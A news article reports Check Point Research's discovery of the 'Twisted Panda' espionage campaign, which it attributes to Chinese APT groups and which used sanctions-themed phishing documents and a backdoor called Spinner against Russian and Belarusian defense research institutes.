HomeNEWSDespite diplomatic proximity, Chinese hackers attack Russia

Despite diplomatic proximity, Chinese hackers attack Russia

Cybersecurity firm Check Point Research has detected a cyber espionage operation targeting the currently active Russian Defense Research Institutes. Attributed to Chinese hackers, the operation uses social engineering techniques to steal confidential information, specifically bait related to Western sanctions against the Russian government.

According to Check Point, the hackers managed to avoid detection for nearly 11 months using new tools: a sophisticated multilayer loader and a backdoor nicknamed Spinner. The campaign was named by the company as “Twisted Panda” to reflect the sophistication of the tools and their attribution to China.


Three defense research targets were identified: two in Russia and one in Belarus. The Russian victims belong, according to Check Point, to a Russian state defense holding company, Rostec Corporation — currently the largest radio-electronics industry conglomerate in the country. The main business of Russian victims is the development and manufacture of electronic systems for war purposes, specialized military radio-electronic equipment, based radar stations and means of state identification.

Chinese hackers send their targets a phishing email containing a document that uses Western sanctions against Russia as bait. When the victim opens the document, they download the malicious code from the attacker-controlled server, which secretly installs and runs a backdoor on the victim’s machine. The backdoor collects the data about the infected device and sends it back to hackers, who have been doing cyber espionage against Russia, according to Check Point, for 11 months.

Documents imitated emblem of the Ministry of Health of Russia

The threat takes advantage of malicious spear-phishing emails that use social engineering techniques. Last March 23, malicious emails were sent to defense research institutes in Russia with the subject line “List of people from subject to US sanctions for invading Ukraine”, containing a link to a website controlled by attackers imitating the Russian Ministry of Health. On the same day, a similar email was also sent to an unknown entity in Minsk (Belarus), with the subject “Spread of deadly pathogens in Belarus by the US”.

All attached documents are designed to look like official Russian Ministry of Health documents, with official emblem and title.

The TTPs (tactics, techniques and procedures) used in the operation allowed Check Point to attribute it to the Chinese APT (Advanced Persistent Threat). According to the company, the “Twisted Panda” campaign features multiple coordinations with long-standing and advanced Chinese cyber-espionage hackers, including the APT10 and the Mustang Panda.

Itay Cohen, head of research at Check Point, says the most sophisticated part of the campaign is social engineering: the timing of attacks and the baits used are “smart” and, from a technical point of view, the quality of the tools is above average. average, even for APT groups.

“It is further evidence that espionage is a systematic, long-term effort in the service of China’s strategic goals to achieve technological superiority,” he said. “We’ve seen how state-sponsored Chinese attackers are taking advantage of the ongoing war between Russia and Ukraine, unleashing advanced tools against what is considered a strategic partner: Russia.”

Main image credit: Mehaniq/Shutterstock

Read more:

Have you watched our new videos on YouTube? Subscribe to our channel!

Must Read